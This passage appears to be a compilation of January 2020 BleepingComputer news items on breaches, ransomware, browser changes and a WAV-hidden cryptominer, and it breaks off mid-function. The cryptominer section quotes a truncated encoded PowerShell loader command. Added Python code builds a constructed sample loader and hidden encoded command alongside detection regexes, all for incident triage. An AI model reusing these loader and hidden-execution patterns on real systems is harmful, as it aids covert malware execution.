This move was prompted by the fact that, as Google revealed three years ago, only roughly 1% of users on Windows, Mac, and Linux were actively using Chrome apps.

Google encouraged web developers at the time to migrate their Chrome apps to the web and, if not possible, to convert them into Chrome extensions or use platforms such as Electron or NW.js.

Expanding on previous announcements, Google has now published a timeline for the full phase-out of Chrome apps during the next two years:

March 2020: Chrome Web Store will stop accepting new Chrome Apps. Developers will be able to update existing Chrome Apps through June 2022.
June 2020: End support for Chrome Apps on Windows, Mac, and Linux. Customers who have Chrome Enterprise and Chrome Education Upgrade will have access to a policy to extend support through December 2020.
December 2020: End support for Chrome Apps on Windows, Mac, and Linux.
June 2021: End support for NaCl, PNaCl, and PPAPI APIs.
June 2021: End support for Chrome Apps on Chrome OS. Customers who have Chrome Enterprise and Chrome Education Upgrade will have access to a policy to extend support through June 2022.
June 2022: End support for Chrome Apps on Chrome OS for all customers.
As the timeline shows, Chrome apps will stop working on Windows, Mac, and Linux in December 2020, with a full shut down for all Chrome OS users in June 2022.

"This change does not impact support for Chrome Extensions. Google will continue to support and invest in Chrome Extensions on all existing platforms," Chrome Platform Team Technical Director Anthony Laforge said.

"Fostering a robust ecosystem of extensions is critical to Chrome's mission and we are committed to providing a useful extension platform for customizing the browsing experience for all users."

Google also provides developers with a Chrome Apps migration site with details on how to build Progressive Web Apps that work on both desktop and mobile platforms, extension-enhanced web pages, and converting Chrome apps into extensions.


Customer-Owned Bank Informs 100k of Breach Exposing Account Balance, PII
20.1.2020 
Bleepingcomputer  Incindent

P&N‌ Bank in Western Australia (WA) is informing its customers that hackers may have accessed personal information stored on its systems following a cyber attack.

The data, some of it sensitive in nature, was stored on the bank’s customer relationship management (CRM) platform that is completely separated from the core banking system.

Plenty of info exposed
A division of Police & Nurses Limited, P&N Bank operates under a customer-owned or mutual model, which does not distinguish between members and shareholders, as they are one and the same. It is the largest of its kind in the state.

The financial organization says in the breach notification sent to customers that the compromised system contained the following information: names, addresses, emails, age, customer and account numbers, as well as the account balance. All this counts as personally identifiable information that is protected under the Privacy Act in Australia.

Funds, social security numbers, and data in identification documents (driver’s license, passport) were stored on a different system and are safe.

source: @vrNicknack
As many as 100,000 individuals may be impacted by the incident, which was labeled as “sophisticated” by Andrew Hadley, the bank’s chief executive officer.

The attack did not target P&N‌ Bank directly. It occurred during a server upgrade around December 12, 2019, at a third-party that was offering hosting services to the organization.

In a statement for The West Australian, Hadley says that one of the Big Four accounting firms (Deloitte, PricewaterhouseCoopers, Ernst & Young or KPMG) has been commissioned to audit the bank’s IT‌ systems.

“Upon becoming aware of the attack, we immediately shut down the source of the vulnerability,” the bank wrote to customers. The West Australian Police (WAPOL) and federal authorities are on the case.

In the time since discovering the attack and informing its customers, the bank assessed the extent of the incident and allowed the police investigation to develop without alerting the intruder.

P&N Bank assures its customers that protecting their information and funds is a priority, stressing that accounts are kept safe with "highly sophisticated security measures and controls."


Ako Ransomware Uses Spam to Infect Its Victims
20.1.2020 
Bleepingcomputer  Ransomware

It has been discovered that the network-targeting Ako ransomware is being distributed through malicious spam attachments that pretend to be a requested agreement.

Last week we reported on the Ako Ransomware and how it was targeting companies with the intent to encrypt their entire network. At the time, it was not known how it was being distributed and when we asked the ransomware operators they told us it was a "secret".

Since then, the ransomware identification site ID-Ransomware has seen an increasing amount of victims.

ID Ransomware Submissions
David Pickett, a Senior Cybersecurity Analyst at AppRiver, reached out to BleepingComputer yesterday to tell us that his company saw the Ako ransomware being distributed through spam email.

These emails pretend to contain an agreement requested by the recipient and use mail subjects such as "Agreement 2020 #1775505".

Spam email distributing the Ako Ransomware
Attached to these emails is a password-protected zip file named agreement.zip with the password '2020' being given in the email.

The extracted archive will contain an executable renamed as agreement.scr that when executed will install the ransomware.

Agreement.zip Archive
As shown by this report from JoeSandbox, when Ako is executed it will encrypt the victim's files and leave them with a ransom note named ako-readme.txt.

Ako Ransom Note
As spam is being used to spread the Ako Ransomware, everyone must be trained on how to properly identify malicious email and not open any attachments without first confirming who sent them and why.

This is especially true for email attachments that are in password-protected archives, as they are commonly used to avoid being detected by secure email gateways and antivirus software.


Online Pharmacy PlanetDrugsDirect Discloses Security Breach
20.1.2020 
Bleepingcomputer  Incindent

Canadian online pharmacy PlanetDrugsDirect is emailing customers, notifying them of a data security incident that might have impacted some of their sensitive personal and financial information.

PlanetDrugsDirect (also known as Planet Drugs Direct) is an active Canadian International Pharmacy Association (CIPA) member, an association of licensed retail pharmacies that sell medication to Canadian and U.S. citizens, and more.

PlanetDrugsDirect describes itself as an "online prescription referral service which provides our customers with direct access to affordable prescription and non-prescription medications" with roughly 400,000 customers.

Online pharmacy security breach
The Canadian online prescription referral service informed an as yet unknown number of customers via email of a recent data security incident that may have impacted some of their data.

"Our investigation to date indicates that your exposed data may include your name, address, e-mail address, phone number, medical information including prescription(s), and payment information," PlanetDrugsDirect says in the breach notification.

"At this moment, there is no evidence to suggest passwords for online account access have been compromised," the online pharmacy adds.

PlanetDrugsDirect also states that the incident is currently under investigation and that additional details will be provided as soon as possible.

"We assure you that we are working diligently to complete the investigation and to rectify the situation," the alert also says.

PlanetDrugsDirect security breach notification
PlanetDrugsDirect's site says that the online pharmacy collects several types of personal, financial, and medical information "necessary for providing service and arranging to fill your orders through our contracted pharmacies and government approved dispensaries."

The collected information usually includes the following: "name, mailing address, e-mail address, telephone number(s), occupation, employment status, referral source, the name of your primary physician (and his or her contact information), age, height, weight, sex, date of birth, the existence and types of drug allergies, medications requested, family medical history information, your personal medical history information, details of your existing medications, credit card information (including card type and number, expiry date and name of card holder) and prescription information."

Clients warned to track bank account and credit card activity
Customers are also advised in PlanetDrugsDirect's security incident notification to keep a close eye on their bank account and credit card activity.

In the event of any unusual activity, customers should immediately notify their bank and credit card company, as well as PlanetDrugsDirect's staff.

Clients can contact the company at 1-888-791-3784 or via e-mail at info@planetdrugsdirect.com.

"We take the privacy and protection of your data very seriously and we are doing everything we can to ensure that you're not impacted further by this incident," PlanetDrugsDirect concludes.

BleepingComputer confirmed the security incident after calling PlanetDrugsDirect's call center to ask for more details. The company's representative was unable to provide additional info other than customers being notified by email of the incident.

We have also reached out via email asking for more details regarding the reported security breach incident but did not hear back at the time of publication.


iPhones Can Now Double As a Security Key for Google Accounts
20.1.2020 
Bleepingcomputer  Apple
Approving sign-ins to a Google Account from an iPhone (Google)
Google announced that iPhones running iOS 10 or later can now be used as security keys to protect Google accounts against phishing attacks by verifying sign-ins on Chrome OS, iOS, macOS and Windows 10 devices without pairing.

This couldn't have come at a better time given that, according to a recent study conducted by Google and The Harris Poll, 74% out of 500 high-risk US users surveyed - including politicians, activists, executives, and influencers — reported being targeted or compromised by a phishing attack.

The free email service Gmail also automatically blocks over 100 million phishing emails every day according to Google, warning those attacked by government-backed actors of phishing attempts.

By enabling iPhone users to defend against phishing attacks using their phone's security key, Google effectively brought the strongest phishing-resistant two-factor authentication (2FA) to Google accounts on the iOS platform.

Unlike other two-factor authentication (2FA) methods that try to verify your sign-in, security keys are built with FIDO standards that provide the strongest protection against automated bots, bulk phishing attacks, and targeted phishing attacks. - Google

Your iPhone as a Google account security key
This comes after Google made the security key built into Android phones running Android 7.0+ (Nougat) generally available last year, having previously allowed iOS users to verify sign-ins into Google and Google Cloud services with the help of Android phones set up as security keys.

The security key in your iPhone works the same: it uses Bluetooth to verify sign-ins on Chrome OS, iOS, macOS and Windows 10 devices without the need to pair your devices.

This way, you can protect your Google account against hacking attempts on any device with your iPhone's help, even when sensitive information like your user credentials has been stolen.

"This makes it easier and more convenient for you to unlock this powerful protection, without having to carry around additional security keys," Google said. "Use it to protect your personal Google Account, as well as your Google Cloud Accounts at work."

Before setting up your iPhone as a Google account security key you will also be prompted to install the Google Smart Lock app and allow it to send notifications.

Setting up your iPhone
You can set up your phone as a security key for your Google Account using the following steps:

Make sure you have 2-Step Verification or Advanced Protection turned on.
Visit myaccount.google.com/security using a supported browser, like Chrome.
Under "Signing in to Google," select 2-Step Verification. You might need to sign in.
Click Add security key, then select your iPhone, then Add.
Follow the on-screen instructions and turn on your iPhone’s built-in security key by tapping Yes, I’m in when prompted to in the Smart Lock app.
To utilize your iPhone's inbuilt security key to sign in to your Google account on new devices you have to:

Make sure Bluetooth is turned on for both devices.
Sign in to your Google Account on a Chrome OS (version 79 and above), iOS, macOS, or Windows 10 device.
Check your iPhone for a Smart Lock notification. Tap the notification.
To verify your sign-in, tap Yes.
Google also recommends registering a backup security key to your Google account to use in the event that you lose your iPhone.

Use your iPhone to enroll in Google's Advanced Protection Program
"You can now use your mobile phone as a security key in the Advanced Protection Program for the enterprise," Google also announced today.

"This means you can use your Android or iOS device’s built-in security key for 2-Step Verification, which makes it easier and quicker to protect high-risk users with our strongest account security settings."

iPhone users can learn more about signing up for the Advanced Protection Program by going to g.co/advancedprotection.

"With attacks on the rise, and many major events on the horizon this year like the U.S. elections in November, the Advanced Protection Program offers a simple way to incorporate the strongest account protection that Google offers," Google Advanced Protection Program PM Shuvo Chatterjee concluded.


Microsoft's Indexer Diagnostics Helps Troubleshoot Windows Search
20.1.2020 
Bleepingcomputer  OS

Microsoft released an Indexer Diagnostics utility to help users troubleshoot and, in some cases, fix Windows Search problems they might experience on their Windows 10 devices.

The tool, which is still in Beta, does this by allowing you to detect potential issues affecting the Search Indexer service by making it possible to check if your files are indexed and what paths are indexed.

"Indexing is the process of looking at files, email messages, and other content on your PC and cataloging their information, such as the words and metadata in them," Microsoft says. "When you search your PC after indexing, it looks at an index of terms to find results faster."

Indexer Diagnostics

Indexer Diagnostics was developed by Microsoft to make some Windows indexing aspects more readily available without having to deal with the restrictions of an update cadence, a source familiar with the matter told BleepingComputer.

Its main purpose is to improve both users' and developers' understanding of the capabilities of Windows Search, as well as to boost the troubleshooting ability and support for general issues affecting Windows Search.

Windows Search troubleshoot helper
By allowing users to look for specific issues affecting the Search Indexer service, the Indexer Diagnostics utility boosts your ability to spot potential problems when Windows Search becomes unresponsive or when search results don't appear as expected on your computer.

Advanced users such as system admins also have the option to track a device's resource usage by collecting resource traces from the app's Performance tab when the indexer uses too many resources, as well as functional traces and application logs when it is not working correctly; these can be attached to bug reports that can be filed from within the app.

Restart and reset the search service
However, Indexer Diagnostics' most important feature is its capability to help you fix several problems that might affect Windows Search by restarting the search service or resetting it.

These built-in one-click fixes, available on the 'Search is not working' tab in the app's sidebar, almost mirror a list of solutions for Search issues published by Microsoft in September 2019 after fixing a Windows Desktop Search known issue on Windows 10, version 1903 devices where searching did not return any results.

Delivered through the MS Store for faster updates
Since the Indexer Diagnostics tool enables you to restart and reset the Windows Search service with a simple mouse click as opposed to the multi-step procedures needed to do it manually, it should help fix search problems faster.

When this is not possible and Windows Search keeps misbehaving by failing to index your files or failing to show results to your queries, it allows you to file a bug report, together with all the relevant information Microsoft needs to analyze and create a fix for your specific problem.

File not being indexed
Failed search query
If we take into account the number of Windows 10 users, having reports coming right after problems are detected through the app's inbuilt feedback channel will allow Redmond's developers to react faster and have a resolution ready a lot quicker.

Microsoft uses the MS Store to ship Indexer Diagnostics updates faster without adding weight to the OS and to take advantage of a newly added mechanism designed to deliver functionality to users who need it without affecting those that won't use it as BleepingComputer was also told.

In addition, Redmond will continue adding functionality to the Indexer Diagnostics app in the future, with the end goal of helping Windows 10 customers experiencing search issues to fix them easier or to report them to the development team for faster patches.


Microsoft's New Edge Browser Released, What You Need to Know
20.1.2020 
Bleepingcomputer  OS

Microsoft's Chromium-based Edge browser is officially released and is now available for download. This new browser ditches Microsoft's home-grown EdgeHTML rendering engine for Google's open-sourced platform called 'Chromium' and the Blink rendering engine, which will add greater compatibility and performance.

This first Stable release is Microsoft Edge 79 and can be downloaded immediately from the Microsoft Edge site for both Windows and Mac. Otherwise, Microsoft Edge will be installed automatically over the coming months via Windows Update.

Microsoft plans on first releasing Microsoft Edge to Windows Insiders in the Release preview ring and then slowly expanding to all other Windows 10 users via Windows Update.

When the new Microsoft Edge is installed, it will replace the existing Edge browser that normally comes with Windows 10. If you do not wish to replace this browser and want to block its install via Windows Update, please see the last section of this article.

It is also possible to run both the classic Edge and the new Microsoft Edge side-by-side using these instructions.

Below we have outlined many of the new features in the new Microsoft Edge browser.

What's new in Microsoft Edge
The new Microsoft Edge is based on Google Chrome so it has many similar features.

Microsoft, though, has also added some features to their browser that makes it stand out from the rest, which we have outlined below.

Block potentially unwanted apps (PUAs)
Chromium-based Microsoft Edge blocks Potentially Unwanted Programs (PUPs) that may display unwanted ads, modify the search engine of the browser, or claim to update your drivers when actually performing malicious or unwanted behavior.

This 'Block potentially unwanted apps' feature blocks Edge from downloading or installing potentially unwanted programs on Windows 10 systems. The feature is not enabled by default and can be enabled from Edge's privacy settings, as highlighted below:

Open Edge settings.
Navigate to Privacy and services settings.
Edge PUPs

Locate "Block potentially unwanted apps" section and enable the feature.
Media Autoplay Blocking
Like the classic Edge, Chromium Edge also comes with a setting to block media autoplay. This prevents videos on random websites with audio from playing in the background without user permission or interaction.

Media play

Media autoplay block settings can be configured from Edge > Settings > Content (edge://settings/content/mediaAutoplay).

Tracking Prevention
Microsoft Edge includes a Tracking prevention feature that blocks third-party tracking scripts on web sites you visit to improve your privacy.

Edge privacy

You can turn this feature off from Edge > Privacy settings or enable the advanced settings to block all trackers.

Use Collections to stay organized
The browser includes a new feature called 'Collections' that helps users organize similar data and save it under one collection.

Collections

This is helpful when comparing shopping items from different stores like Amazon or Microsoft, or when collecting and combining information from multiple sites for a project.

To enable Collections in Microsoft Edge, follow these steps:

In the address bar, enter edge://flags or edge://flags#edge-collections. If you open edge://flags menu, you will have to search for Collections.
Collections

Click the dropdown and choose Enabled.

Click the Restart button located at the bottom banner to relaunch Microsoft Edge with the Collections feature.
Stream 4K Netflix Video
Microsoft Edge is the first Chromium browser to stream Netflix content at 4K resolution. This is done through Microsoft's PlayReady DRM implementation.

Edge 4K

Google Chrome, on the other hand, can only stream Netflix at 1080p HD.

Edge can Read Web Pages in 24 Different Voices
Microsoft is updating Edge's built-in Read Aloud feature with 24 male and female voices from different parts of the world including the United States, United Kingdom, and India.

The accents of China, Japan, the UK, France, Germany, and Mexico are also supported.

Block Microsoft Edge forced installation
If you want to continue using the Classic Microsoft Edge, Microsoft has released a tool called the 'Microsoft Edge Blocker Toolkit' to prevent the forced installation of Chromium Edge.

With Blocker Toolkit, you can prevent Microsoft from replacing the current Edge browser on your Windows 10 Home, Pro or Enterprise systems.

The Blocker Toolkit only prevents the browser from being automatically installed via Windows Update on Windows 10 RS4 and newer.
The Blocker Toolkit will not prevent users from manually installing Microsoft Edge after you have blocked Windows Update.
Organizations do not need to deploy the Blocker Toolkit in environments managed with an update management solution such as Windows Server Update Services or System Center Configuration Manager. Organizations can use those products to fully manage the deployment of updates released through Windows Update and Microsoft Update, including Microsoft Edge (Chromium-based), within their environment.
Microsoft says Blocker Toolkit may create a Registry value that blocks the automatic installation of the new Microsoft Edge on Windows 10 April 2018 Update (version 1803) or newer.

The Registry value is created under the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EdgeUpdate key and value is called DoNotUpdateToEdgeWithChromium.

When you use the tool, the value is set to 1 and Edge installation via Windows Update will be blocked. If the value is 0 or not set, Edge will be automatically downloaded and installed.

You can learn more about this process in our dedicated article: How to Block Windows 10 Update Force Installing the New Edge Browser.


Microsoft Office January Security Updates Fix Code Execution Bugs
20.1.2020 
Bleepingcomputer  OS

Microsoft released the January 2020 Office security updates, bundling a total of seven security updates and three cumulative updates for five different products, six of them patching flaws allowing remote code execution.

Redmond also released the January 2020 Patch Tuesday security updates, with security updates for 49 vulnerabilities, seven of them being classified as Critical and 41 as Important.

Unlike previous Patch Tuesday releases, Microsoft did not publicly disclose any vulnerabilities found to be actively exploited in the wild.

To download Microsoft Office security updates on your device, you have to click on the corresponding Knowledge Base article in the table below and then scroll down to the "How to download and install the update" section to grab the update packages for each product.

Patched Microsoft Office vulnerabilities
Out of the seven security updates released by Microsoft for several Office products, six patch remote code execution (RCE) bugs detailed in the CVE-2020-0650, CVE-2020-0651, and CVE-2020-0652 security advisories, and impacting Office 2016, Office 2013, Office 2010, Excel 2016, Excel 2013, and Excel 2010.

The RCE security vulnerabilities patched today received a severity rating of 'Important' from Microsoft given that they could allow potential attackers to execute arbitrary code and/or commands after successfully exploiting vulnerable Windows devices.

Attackers could then install programs, view, change, and delete data, or create new accounts with full user rights on the compromised computers.

The other security update tracked as CVE-2020-0647 is a Microsoft Office Online spoofing vulnerability impacting Office Online Server and is caused by incorrect validation of origin in cross-origin communications.

"The attacker who successfully exploited the vulnerability could then perform cross-origin attacks on affected systems," Microsoft explains.

"These attacks could allow the attacker to read content that the attacker is not authorized to read, and use the victim's identity to take actions on the site on behalf of the victim. The victim needs to be authenticated for an attacker to compromise the victim."

January 2020 Microsoft Office security updates
The January Microsoft Office security updates are available via the Download Center and the Microsoft Update platform.

Additional info on each of them is available within the linked knowledge base articles.

Microsoft Office 2016
Product | Knowledge Base article title and number
Excel 2016 | Security update for Excel 2016: January 14, 2020 (KB4484217)
Office 2016 | Security update for Office 2016: January 14, 2020 (KB4484221)

Microsoft Office 2013
Product | Knowledge Base article title and number
Excel 2013 | Security update for Excel 2013: January 14, 2020 (KB4484234)
Office 2013 | Security update for Office 2013: January 14, 2020 (KB4484227)

Microsoft Office 2010
Product | Knowledge Base article title and number
Excel 2010 | Security update for Excel 2010: January 14, 2020 (KB4484243)
Office 2010 | Security update for Office 2010: January 14, 2020 (KB4484236)

Microsoft SharePoint Server 2019
Product | Knowledge Base article title and number
Office Online Server | Security update for Office Online Server: January 14, 2020 (KB4484223)

Microsoft SharePoint Server 2013
Product | Knowledge Base article title and number
Project Server 2013 | January 14, 2020, cumulative update for Project Server 2013 (KB4484230)
SharePoint Enterprise Server 2013 | January 14, 2020, cumulative update for SharePoint Enterprise Server 2013 (KB4484232)
SharePoint Foundation 2013 | January 14, 2020, cumulative update for SharePoint Foundation 2013 (KB4484228)


Windows 7 Begins to Show Full Screen Windows 10 Upgrade Alerts
20.1.2020 
Bleepingcomputer  OS

When users log into Windows 7 today, they should not be surprised if they see a full-screen alert telling them that the operating system is no longer supported, they are vulnerable to viruses, and that they should upgrade to Windows 10 to fix all of these issues.

Yesterday, January 14th, 2020, Windows 7 officially reached the end of life, which means it will no longer be supported, receive free security updates, and bug fixes.

As a way of warning users and promoting Windows 10 at the same time, Microsoft installed a program called EOSNotify in the December Windows 7 KB4530734 Monthly Rollup.

Since then, every time a Windows 7 user logged into their computer and at noon every day, a scheduled task was started that launched the %windir%\system32\EOSNotify.exe program.

Once the date reached January 15th, 2020, instead of lying dormant and not displaying anything, the program began to show full-screen alerts that cover your entire screen, including the desktop, on all Windows 7 machines around the world. What you see below is all you will see on your monitor when the alert is displayed, as it covers the entire screen.

Windows 7 End of Life alert
For users who do not have the time to read it, they can click on the "Remind me later" button to close the alert and have it be shown again at a later date.

If users never want to see this alert again, they can click on the 'Don't remind me again' button.

For users who have not been shown this alert yet, they can configure the following registry key to prevent it from ever being displayed in the first place.

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\EOSNotify]
"DiscontinueEOS"=dword:00000001

For those who want more technical information about how this alert works, you can read our original reporting on the EOSNotify application.

While most of us who use computers regularly already know that Windows 7 is no longer supported, many people have no idea.

As annoying and intrusive as this alert is, it makes sense to display it so that everyone knows their system will no longer be adequately protected.

This lets them make an informed decision about whether to upgrade to Windows 10, which can still be done for free, switch to a Mac, or even give Linux and its Windows 7 theme a try.


Google Chrome Aims to Make Browser User-Agents Obsolete
20.1.2020 
Bleepingcomputer  Security

To enhance the privacy of its users and reduce the complexity of updating User-Agent strings, Google Chrome plans to move to a new system that web sites can use to identify information about their visitors.

When connecting to a web site, a browser will send a User-Agent string to the webserver that can be used to identify the name of the browser, its version, the operating system, and its rendering engine.

Web sites can use this browser information to determine what type of content they will send back or if their site even supports the browser.

As time has gone on and browsers have integrated various technology from other companies, User-Agent strings have become convoluted and unwieldy.

For example, below is the user-agent for Chrome 79.0.3945.117, which as you can see also includes confusing references to other browsers such as Safari and Mozilla.

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Even worse, because of the specific information they contain, User-Agent strings are a privacy risk: Google states they are commonly used by fingerprinting scripts to track users.

Google wants to freeze the User-Agent and switch to Client Hints
To increase the privacy of their users and still allow web sites to get information about a client, Chrome developer Yoav Weiss intends to move away from user-agent strings and instead adopt the HTTP specification called 'UA Client Hints'.

"The User-Agent string is an abundant source of passive fingerprinting information about our users. It contains many details about the user’s browser and device as well as many lies ("Mozilla/5.0", anyone?) that were or are needed for compatibility purposes, as servers grew reliant on bad User Agent sniffing.

On top of those privacy issues, User-Agent sniffing is an abundant source of compatibility issues, in particular for minority browsers, resulting in browsers lying about themselves (generally or to specific sites), and sites (including Google properties) being broken in some browsers for no good reason."

What Weiss proposes is to eventually freeze the User-Agent string of Google Chrome so that they always send the same string regardless of the browser's version.

For example, the Chrome Mobile User-Agent would be frozen at:

Mozilla/5.0 (Linux; Android 9; Unspecified Device) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.1.2222.33 Mobile Safari/537.36
The Chrome Desktop User-Agent would be frozen at:

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.1.2222.33 Safari/537.36
When a user visits a web site, the request will contain the frozen UA string as well as a special 'Sec-CH-UA' header that carries only basic, low-entropy information about the client, as shown below.

Sec-CH-UA: "Examplary Browser 73"
If a web site needs more than this basic information, it requests it through an 'opt-in' response header that asks for more detailed hints, such as the minor version and the operating system of the visitor.

This is done with the following response header:

Accept-CH: UA, Platform
Once the web site has opted in, the browser would include headers containing the requested information on all subsequent requests to it:

Sec-CH-UA: "Examplary Browser 73.3R8.2H.1"
Sec-CH-Platform: "Windows 10"
Ultimately, though, it is up to the browser whether to honor these requests for more information and what information is sent to the web site.

This means that if a request comes from a site that is known to be abusive, Google can decide not to send any further client information to it.

To use Client Hints, a web site must first satisfy the following requirements:

Server opt-ins must be delivered on a top-level navigation request, over a secure connection.
Hints are only delivered with same-origin requests, over a secure connection.
If the first party wants hints to be delivered to certain third-party hosts, the first-party can explicitly delegate specific hints to specific hostnames.
Hints are Sec- prefixed, to provide servers with more confidence regarding the values they deliver, as well as to avoid legacy server bugs.
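The opt-in exchange and the four delivery rules above, modelled end to end as an added example (this is not code from the proposal, from Chrome, or from the article): the frozen UA string, the hint names and the example values are the ones quoted above; the client-side policy logic, the origins and the exchange itself are this example's own construction, and delegation of hints to third-party hosts is not modelled.

```python
from urllib.parse import urlsplit

# Strings quoted in the proposal above; the policy model below is this example's own.
FROZEN_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/71.1.2222.33 Safari/537.36")
LOW_ENTROPY_UA = '"Examplary Browser 73"'
# Accept-CH token -> (request header, high-entropy value sent only after opt-in).
HIGH_ENTROPY = {
    "UA": ("Sec-CH-UA", '"Examplary Browser 73.3R8.2H.1"'),
    "Platform": ("Sec-CH-Platform", '"Windows 10"'),
}


def origin(url):
    p = urlsplit(url)
    return (p.scheme, p.hostname, p.port)


class HintAwareClient:
    """Minimal model of a browser applying the four delivery rules listed above."""

    def __init__(self):
        self.opt_ins = {}  # origin -> set of hint tokens that origin asked for

    def process_response(self, url, response_headers, top_level):
        """Record an Accept-CH opt-in, but only from a top-level navigation over HTTPS."""
        target = origin(url)
        accept = response_headers.get("Accept-CH")
        if accept is None or not top_level or target[0] != "https":
            return False
        tokens = {t.strip() for t in accept.split(",") if t.strip() in HIGH_ENTROPY}
        self.opt_ins.setdefault(target, set()).update(tokens)
        return bool(tokens)

    def request_headers(self, url, page_origin=None):
        """Headers attached to a request for `url`. page_origin is the top-level page
        issuing a subresource request; None means this request is the navigation itself."""
        target = origin(url)
        headers = {"User-Agent": FROZEN_UA, "Sec-CH-UA": LOW_ENTROPY_UA}
        secure = target[0] == "https"
        same_origin = page_origin is None or page_origin == target
        # Sec- prefixed headers cannot be set by page script, so their presence
        # tells the server that the browser itself produced the value.
        if secure and same_origin:
            for token in sorted(self.opt_ins.get(target, ())):
                name, value = HIGH_ENTROPY[token]
                headers[name] = value
        return headers


def example_exchange():
    """Navigation, opt-in, then a same-origin and a third-party subresource request."""
    client = HintAwareClient()
    site = "https://example.test/"          # constructed origin for the demo
    first = client.request_headers(site)
    # The server only sees the low-entropy value and asks for more via Accept-CH.
    client.process_response(site, {"Accept-CH": "UA, Platform"}, top_level=True)
    same_site = client.request_headers(site + "app.js", page_origin=origin(site))
    third_party = client.request_headers("https://cdn.example-cdn.test/lib.js",
                                         page_origin=origin(site))
    return first, same_site, third_party
```

The Sec- prefix does real work here: the Fetch standard treats Sec-* as forbidden request header names, so page script cannot forge them and a server that receives Sec-CH-Platform knows the browser, not a script, produced the value. The model also shows why third-party scripts lose out: the request to the CDN origin carries only the low-entropy header, because the opt-in was recorded for the first-party origin alone.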
As part of this plan, Google hopes to deprecate access to the navigator.userAgent JavaScript property in Chrome 81 (the property keeps working, but reading it is flagged as deprecated), freeze the browser version in the User-Agent string in Chrome 83, and unify the OS/device portion of the string to a common value across desktop browsers, and separately across mobile devices, in Chrome 85.

Milestone  Stable date          Action
M81        Mid March ‘20        Deprecate access to `navigator.userAgent`
M83        Early June ‘20       Freeze browser version and unify OS versions
M85        Mid September ‘20    Unify desktop OS string as a common value for desktop browsers; unify mobile OS/device strings as a similarly common value for those at M85 (*)

Other vendors, such as Microsoft and Mozilla, have indicated that they support this change, while Safari already froze their UA string to some degree other than operating system version changes.

Concerns about using Client Hints
Switching to Client Hints as a method for web sites to gain information about a client appears to be a good idea but does have some issues.

As the Client Hints opt-in is only honored on the top-level navigation request, third-party scripts that require User-Agent information will need to work with the web sites that embed them to receive this information.

Furthermore, as the browser does not send detailed information about the client in the first request, there will be a delay in getting detailed information for sites that need it.


Windows BSOD Betrays Cryptominer Hidden in WAV File
20.1.2020 
Bleepingcomputer  Cryptocurrency  OS

The infamous blue screen of death (BSOD) on computers belonging to a company in the medical tech sector was the tell for a malware infection that spread across more than half the network.

The malware was hiding its modules in WAV audio files and spread to vulnerable Windows 7 machines on the network via EternalBlue, the exploit for SMBv1 used in the devastating WannaCry and NotPetya cyber attacks from 2017.

EternalBlue and cryptojacking
Security researchers providing incident response services found that more than 800 computers had been compromised, starting October 14, 2019. The infection was discovered by investigating systems that had experienced a BSOD crash since that date.

Lacking kernel memory dumps, which would have pointed to what triggered the error, the researchers from Guardicore relied on attack residue to determine the cause.

They found that infected machines read data from a registry key (HKLM\Software\Microsoft\Windows\CurrentVersion\Shell) and executed a rather long command, which turned out to be a PowerShell script that had not been classified as malicious, although it was publicly available, passed Base64-encoded on the command line:

C:\Windows\System32\WindowsPowershell\v1.0\PowerShell.exe -NonInteractive -WindowStyle Hidden -EncodeCommand JABTAEUAZgA4AGMAYQBXAGoAIAA9ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAG…==
An endpoint detection and response (EDR) platform the company installed in its attempt to solve the problem revealed that the malware-loading process involved two libraries, cscdll.dll and cscomp.dll, which are used for "compiling C# and executed when C# code is loaded and executed from memory."
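As an added example (not the script from the incident and not Guardicore's code), a small triage routine of the kind a responder would run over logged process command lines: it decodes a -EncodedCommand blob (Base64 over UTF-16LE) and flags the traits seen in this loader, namely a hidden, non-interactive PowerShell, a payload read from the HKLM ...\CurrentVersion\Shell registry key, and C# compiled in memory with Add-Type. The sample script and command line are constructed here to reproduce those traits; decoding the prefix of the real command above yields `$SEf8caWj = "HKLM:\Software\M`, which is the only thing the sample borrows from it. That in-memory C# compilation would be what pulls in the C# compiler libraries the EDR observed is an assumption.

```python
import base64
import binascii
import re

# Constructed sample script: NOT the incident's script, only the traits the article
# names (registry-stored payload, C# compiled in memory). The variable name is the
# one decodable from the prefix of the real command above; the rest is invented.
SAMPLE_SCRIPT = (
    '$SEf8caWj = "HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Shell"; '
    '$src = (Get-ItemProperty -Path $SEf8caWj).Blob; '
    'Add-Type -TypeDefinition $src; [Loader]::Run()'
)


def encode_command(script):
    """powershell.exe -EncodedCommand takes Base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_CMDLINE = (
    "C:\\Windows\\System32\\WindowsPowershell\\v1.0\\PowerShell.exe "
    "-NonInteractive -WindowStyle Hidden -EncodedCommand " + encode_command(SAMPLE_SCRIPT)
)

# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe; the
# EncodeCommand spelling in the logged command above is tolerated by en[a-z]*.
ENC_FLAG = re.compile(r"-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
CMDLINE_INDICATORS = {
    "encoded-command": ENC_FLAG,
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
    "non-interactive": re.compile(r"-noni[a-z]*", re.IGNORECASE),
}
SCRIPT_INDICATORS = {
    "payload-in-registry": re.compile(
        r"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Shell", re.IGNORECASE),
    "in-memory-csharp": re.compile(
        r"Add-Type|CSharpCodeProvider|\[Reflection\.Assembly\]::Load", re.IGNORECASE),
}


def decode_encoded_command(cmdline):
    """Return the script carried in -EncodedCommand, or None if absent or undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except binascii.Error:
        return None  # truncated or redacted blob, as in the log excerpt above
    return raw.decode("utf-16-le", errors="replace")


def triage(cmdline):
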